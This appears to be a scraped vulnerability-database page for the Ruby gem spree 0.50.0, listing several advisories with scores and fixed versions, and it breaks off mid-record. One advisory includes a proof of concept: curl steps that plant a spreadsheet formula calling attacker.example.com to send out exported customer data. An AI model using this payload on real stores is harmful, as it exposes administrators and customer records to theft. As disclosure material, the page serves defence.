Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:gem/spree@0.50.0
Typegem
Namespace
Namespree
Version0.50.0
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_versionnull
Latest_non_vulnerable_versionnull
Affected_by_vulnerabilities
0
url VCID-153y-kwk2-xyfd
vulnerability_id VCID-153y-kwk2-xyfd
summary 
Spree: CSV Formula Injection in Customer Export
### Summary

CSV formula injection (also known as formula injection or CSV injection) affects customer export. User-controlled values customer names, email addresses, and shipping addresses. When an administrator opens a crafted
Export in Microsoft Excel or LibreOffice Calc, formulas embedded in user data execute in the
context of the administrator's desktop, potentially exfiltrating data or executing OS commands
via DDE (Dynamic Data Exchange).

---

### Details

#### Affected presenters and fields

| Presenter | Path | User-controlled fields |
|---|---|---|
| `CustomerPresenter` | `spree/core/app/presenters/spree/csv/customer_presenter.rb:36` | `first_name`, `last_name`, `address1`, `address2`, `city`, `phone` |

#### Vulnerable code — `customer_presenter.rb` (representative example)

```ruby
# spree/core/app/presenters/spree/csv/customer_presenter.rb:36–53
def call
  csv = [
    customer.first_name,          # ← written verbatim; may contain =HYPERLINK(...)
    customer.last_name,           # ← user-controlled
    customer.email,              
    customer.accepts_email_marketing ? Spree.t(:say_yes) : Spree.t(:say_no),
    customer.address&.company,    # ← user-controlled
    customer.address&.address1,   # ← user-controlled
    customer.address&.address2,   # ← user-controlled
    customer.address&.city,       # ← user-controlled
    customer.address&.state_text,
    customer.address&.state_abbr,
    customer.address&.country&.name,
    customer.address&.country&.iso,
    customer.address&.zipcode,
    customer.phone,               # ← user-controlled
    customer.amount_spent_in(Spree::Store.current.default_currency),
    customer.completed_orders.count,
  ]
  csv += metafields_for_csv(customer)
  csv
end
```

---

### PoC

**Precondition**: A Spree store with public customer registration enabled (default
configuration). No special permissions required for the attacker.

#### Step 1 — Register as a customer with an injected first name

```bash
curl -X POST https://store.example.com/api/v3/store/customers \
  -H "Content-Type: application/json" \
  -H "X-Spree-Api-Key: pk_<publishable_api_key>" \
  -d '{
    "email": "attacker@evil.com",
    "password": "password123",
    "password_confirmation": "password123",
    "first_name": "=HYPERLINK(\"http://attacker.example.com/exfil?d=\"&B1,\"Click\")",
    "last_name": "Smith"
  }'
```

#### Step 2 — Admin triggers a customer export

```bash
curl -X POST https://store.example.com/api/v3/admin/exports \
  -H "Authorization: Bearer <admin_jwt>" \
  -H "Content-Type: application/json" \
  -d '{"type": "Spree::Exports::Customers", "record_selection": "all"}'
```

#### Step 3 — Admin polls until ready, then downloads

```bash
# Poll for completion
curl https://store.example.com/api/v3/admin/exports/<export_id> \
  -H "Authorization: Bearer <admin_jwt>"

# Download
curl https://store.example.com/api/v3/admin/exports/<export_id>/download \
  -H "Authorization: Bearer <admin_jwt>" \
  -o customers.csv
```

#### Step 4 — Verify injection in the raw CSV (without opening in Excel)

Open `customers.csv` in a text editor. The first data row will contain:

```
"=HYPERLINK(""http://attacker.example.com/exfil?d=""&B1,""Click"")","Smith","attacker@evil.com",...
```

#### Step 5 — Admin opens `customers.csv` in Microsoft Excel (Windows)

- Excel warns about external data connections; if the administrator clicks **Enable**, the
  `HYPERLINK` formula fires and sends a GET request to `http://attacker.example.com/exfil?d=<B1_value>`.
- Cell B1 in the customers export is the **Last Name** column. Adjacent columns contain
  email, address, and order total data for all exported customers.
- With the DDE variant (`=CMD|...`) on older or unpatched Excel versions, a subprocess
  is launched on the administrator's machine.

---

### Impact

**Vulnerability class**: CSV / Formula Injection (CWE-1236)

#### Who is impacted

- **Administrators** who download and open export files in spreadsheet software are the
  direct victims. Administrative accounts have access to all store data, payment method
  configurations, customer PII, and full order history.

#### Realistic attack chain

| Step | Actor | Action | Privilege required |
|---|---|---|---|
| 1 | Attacker | Registers as customer | Public registration |
| 2 | Attacker | Sets `first_name` to formula payload | None beyond registration |
| 3 | Admin | Runs a routine weekly/monthly export | Normal operational task |
| 4 | Admin | Opens CSV in Excel | None |
| 5 | Attacker | Receives exfiltrated spreadsheet data | Passive |

#### Data at risk

All data visible to the administrator in the spreadsheet at the time of opening, including:

- All exported customer emails, names, addresses, phone numbers
- Order totals and purchase history
- Any other columns in the same export file
references
0
reference_url https://github.com/spree/spree
reference_id
reference_type
scores
0
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree
1
reference_url https://github.com/spree/spree/releases/tag/v5.2.8
reference_id
reference_type
scores
0
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/releases/tag/v5.2.8
2
reference_url https://github.com/spree/spree/releases/tag/v5.3.6
reference_id
reference_type
scores
0
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/releases/tag/v5.3.6
3
reference_url https://github.com/spree/spree/releases/tag/v5.4.3
reference_id
reference_type
scores
0
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/releases/tag/v5.4.3
4
reference_url https://github.com/spree/spree/security/advisories/GHSA-xf4v-w5x5-pv79
reference_id
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/security/advisories/GHSA-xf4v-w5x5-pv79
5
reference_url https://github.com/advisories/GHSA-xf4v-w5x5-pv79
reference_id GHSA-xf4v-w5x5-pv79
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xf4v-w5x5-pv79
fixed_packages
0
url pkg:gem/spree@5.2.8
purl pkg:gem/spree@5.2.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.2.8
1
url pkg:gem/spree@5.3.6
purl pkg:gem/spree@5.3.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.3.6
2
url pkg:gem/spree@5.4.3
purl pkg:gem/spree@5.4.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.4.3
aliases GHSA-xf4v-w5x5-pv79
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-153y-kwk2-xyfd
1
url VCID-7jum-4ny7-xuhy
vulnerability_id VCID-7jum-4ny7-xuhy
summary 
Remote Command Execution in Spree search functionality
Spree versions prior to 0.60.2 contain a remote command execution
vulnerability in the search functionality. The application fails to
properly sanitize input passed via the `search[:send][]` parameter,
which is dynamically invoked using Ruby’s `send` method. This allows
attackers to execute arbitrary shell commands on the server without
authentication.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2011-10019
reference_id
reference_type
scores
0
value 0.6931
scoring_system epss
scoring_elements 0.98663
published_at 2026-06-08T12:55:00Z
1
value 0.6931
scoring_system epss
scoring_elements 0.98664
published_at 2026-06-07T12:55:00Z
2
value 0.79644
scoring_system epss
scoring_elements 0.99115
published_at 2026-06-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2011-10019
1
reference_url https://github.com/advisories/GHSA-97vm-c39p-jr86
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-97vm-c39p-jr86
2
reference_url https://github.com/orgs/spree
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 10
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/
url https://github.com/orgs/spree
3
reference_url https://github.com/spree/spree
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree
4
reference_url https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_search_exec.rb
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 10
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/
url https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_search_exec.rb
5
reference_url https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group
6
reference_url https://www.exploit-db.com/exploits/17941
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 10
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/
url https://www.exploit-db.com/exploits/17941
7
reference_url https://www.vulncheck.com/advisories/spreecommerce-search-parameter-rce
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 10
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/
url https://www.vulncheck.com/advisories/spreecommerce-search-parameter-rce
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2011-10019
reference_id CVE-2011-10019
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements
1
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
3
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2011-10019
9
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10019.yml
reference_id CVE-2011-10019.YML
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10019.yml
10
reference_url https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/
reference_id remote-command-product-group
reference_type
scores
0
value 10
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/
url https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/
fixed_packages
0
url pkg:gem/spree@0.60.2
purl pkg:gem/spree@0.60.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
3
vulnerability VCID-t9gu-2vs3-g7cu
4
vulnerability VCID-y37s-b27m-n7ad
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.60.2
1
url pkg:gem/spree@0.70.0.rc2
purl pkg:gem/spree@0.70.0.rc2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
3
vulnerability VCID-t9gu-2vs3-g7cu
4
vulnerability VCID-y37s-b27m-n7ad
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.70.0.rc2
aliases CVE-2011-10019, GHSA-97vm-c39p-jr86, OSV-76011
risk_score 10.0
exploitability 2.0
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7jum-4ny7-xuhy
2
url VCID-cwh1-mmky-ukcx
vulnerability_id VCID-cwh1-mmky-ukcx
summary 
Ensure that doorkeeper_token is valid when authenticating requests in API v2 calls
### Impact

The perpetrator who previously obtained an old expired user
token could use it to access Storefront API v2 endpoints.

### Patches

Please upgrade to 3.7.11, 4.0.4, or 4.1.11 depending on your used Spree version.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-15269
reference_id
reference_type
scores
0
value 0.00257
scoring_system epss
scoring_elements 0.49283
published_at 2026-06-04T12:55:00Z
1
value 0.00257
scoring_system epss
scoring_elements 0.49319
published_at 2026-06-09T12:55:00Z
2
value 0.00257
scoring_system epss
scoring_elements 0.49307
published_at 2026-06-08T12:55:00Z
3
value 0.00257
scoring_system epss
scoring_elements 0.49337
published_at 2026-06-07T12:55:00Z
4
value 0.00257
scoring_system epss
scoring_elements 0.49354
published_at 2026-06-06T12:55:00Z
5
value 0.00257
scoring_system epss
scoring_elements 0.49344
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-15269
1
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2020-15269.yml
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2020-15269.yml
2
reference_url https://github.com/spree/spree
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree
3
reference_url https://github.com/spree/spree/commit/e43643abfe51f54bd9208dd02298b366e9b9a847
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/commit/e43643abfe51f54bd9208dd02298b366e9b9a847
4
reference_url https://github.com/spree/spree/security/advisories/GHSA-f8cm-364f-q9qh
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3
scoring_elements
1
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/security/advisories/GHSA-f8cm-364f-q9qh
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-15269
reference_id CVE-2020-15269
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-15269
6
reference_url https://github.com/advisories/GHSA-f8cm-364f-q9qh
reference_id GHSA-f8cm-364f-q9qh
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-f8cm-364f-q9qh
fixed_packages
0
url pkg:gem/spree@3.7.11
purl pkg:gem/spree@3.7.11
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-yqz2-9hru-wkcs
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@3.7.11
1
url pkg:gem/spree@4.0.4
purl pkg:gem/spree@4.0.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-yqz2-9hru-wkcs
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@4.0.4
2
url pkg:gem/spree@4.1.11
purl pkg:gem/spree@4.1.11
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-yqz2-9hru-wkcs
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@4.1.11
aliases CVE-2020-15269, GHSA-f8cm-364f-q9qh
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-cwh1-mmky-ukcx
3
url VCID-s4mu-v75h-dfep
vulnerability_id VCID-s4mu-v75h-dfep
summary 
Private information access through CSRF
A vulnerability in the API can allow an attacker to commit CSRF gaining access to private information.
references
0
reference_url http://osvdb.org/show/osvdb/119205
reference_id
reference_type
scores
url http://osvdb.org/show/osvdb/119205
1
reference_url https://spreecommerce.com/blog/security-updates-2015-3-3
reference_id
reference_type
scores
url https://spreecommerce.com/blog/security-updates-2015-3-3
fixed_packages
0
url pkg:gem/spree@2.2.10
purl pkg:gem/spree@2.2.10
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.2.10
1
url pkg:gem/spree@2.3.8
purl pkg:gem/spree@2.3.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.3.8
2
url pkg:gem/spree@2.4.5
purl pkg:gem/spree@2.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.4.5
3
url pkg:gem/spree@3.0.0.rc4
purl pkg:gem/spree@3.0.0.rc4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@3.0.0.rc4
aliases OSVDB-119205
risk_score null
exploitability 0.5
weighted_severity 0.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-s4mu-v75h-dfep
4
url VCID-t9gu-2vs3-g7cu
vulnerability_id VCID-t9gu-2vs3-g7cu
summary 
Permissions, Privileges, and Access Controls
app/models/spree/user.rb in spree_auth_devise in Spree does not perform mass assignment safely when updating a user, which allows remote authenticated users to assign arbitrary roles to themselves.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2013-2506
reference_id
reference_type
scores
0
value 0.00171
scoring_system epss
scoring_elements 0.38121
published_at 2026-06-07T12:55:00Z
1
value 0.00171
scoring_system epss
scoring_elements 0.38098
published_at 2026-06-09T12:55:00Z
2
value 0.00171
scoring_system epss
scoring_elements 0.38087
published_at 2026-06-08T12:55:00Z
3
value 0.00171
scoring_system epss
scoring_elements 0.38055
published_at 2026-06-04T12:55:00Z
4
value 0.00171
scoring_system epss
scoring_elements 0.38145
published_at 2026-06-05T12:55:00Z
5
value 0.00171
scoring_system epss
scoring_elements 0.38149
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2013-2506
1
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth/CVE-2013-2506.yml
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth/CVE-2013-2506.yml
2
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2013-2506.yml
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2013-2506.yml
3
reference_url https://github.com/spree/spree_auth_devise
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree_auth_devise
4
reference_url https://github.com/spree/spree_auth_devise/commit/038d74771d3b5c13d13b738b73dfda1033a99f65
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree_auth_devise/commit/038d74771d3b5c13d13b738b73dfda1033a99f65
5
reference_url https://github.com/spree/spree_auth_devise/commit/fda3ab9fb536c64fe18a9b78bb21c6176b3ea24d
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree_auth_devise/commit/fda3ab9fb536c64fe18a9b78bb21c6176b3ea24d
6
reference_url http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
reference_id
reference_type
scores
url http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
7
reference_url https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
reference_id
reference_type
scores
url https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
8
reference_url https://web.archive.org/web/20131207040639/https://rubygems.org/gems/spree_auth_devise/versions
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20131207040639/https://rubygems.org/gems/spree_auth_devise/versions
9
reference_url https://web.archive.org/web/20160331131233/https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20160331131233/https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2013-2506
reference_id CVE-2013-2506
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2013-2506
11
reference_url https://github.com/advisories/GHSA-jp57-9j37-5476
reference_id GHSA-jp57-9j37-5476
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jp57-9j37-5476
fixed_packages
0
url pkg:gem/spree@1.2.0.rc1
purl pkg:gem/spree@1.2.0.rc1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
3
vulnerability VCID-t9gu-2vs3-g7cu
4
vulnerability VCID-y37s-b27m-n7ad
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.2.0.rc1
1
url pkg:gem/spree@1.2.0
purl pkg:gem/spree@1.2.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
3
vulnerability VCID-t9gu-2vs3-g7cu
4
vulnerability VCID-y37s-b27m-n7ad
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.2.0
2
url pkg:gem/spree@1.3.0
purl pkg:gem/spree@1.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
3
vulnerability VCID-t9gu-2vs3-g7cu
4
vulnerability VCID-y37s-b27m-n7ad
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.3.0
3
url pkg:gem/spree@3.0.5
purl pkg:gem/spree@3.0.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@3.0.5
aliases CVE-2013-2506, GHSA-jp57-9j37-5476, OSV-90865
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-t9gu-2vs3-g7cu
5
url VCID-y37s-b27m-n7ad
vulnerability_id VCID-y37s-b27m-n7ad
summary 
Authenticated administrators to execute arbitrary commands
Spree Commerce allow remote authenticated administrators to instantiate arbitrary Ruby objects and execute arbitrary commands via the (1) payment_method parameter to core/app/controllers/spree/admin/payment_methods_controller.rb; and the (2) promotion_action parameter to promotion_actions_controller.rb, (3) promotion_rule parameter to promotion_rules_controller.rb, and (4) calculator_type parameter to promotions_controller.rb in promo/app/controllers/spree/admin/, related to unsafe use of the constantize function.
references
0
reference_url http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1656
reference_id
reference_type
scores
url http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1656
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2013-1656
reference_id
reference_type
scores
0
value 0.00305
scoring_system epss
scoring_elements 0.541
published_at 2026-06-05T12:55:00Z
1
value 0.00305
scoring_system epss
scoring_elements 0.54074
published_at 2026-06-08T12:55:00Z
2
value 0.00305
scoring_system epss
scoring_elements 0.54097
published_at 2026-06-09T12:55:00Z
3
value 0.00305
scoring_system epss
scoring_elements 0.54043
published_at 2026-06-04T12:55:00Z
4
value 0.00305
scoring_system epss
scoring_elements 0.54108
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2013-1656
2
reference_url https://blog.convisoappsec.com/en/spree-commerce-multiple-unsafe-reflection-vulnerabilities-cve-2013-1656
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://blog.convisoappsec.com/en/spree-commerce-multiple-unsafe-reflection-vulnerabilities-cve-2013-1656
3
reference_url https://github.com/advisories/GHSA-jxx8-v83v-rhw3
reference_id
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jxx8-v83v-rhw3
4
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2013-1656.yml
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2013-1656.yml
5
reference_url https://github.com/spree/spree
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree
6
reference_url https://github.com/spree/spree/commit/70092eb55b8be8fe5d21a7658b62da658612fba7
reference_id
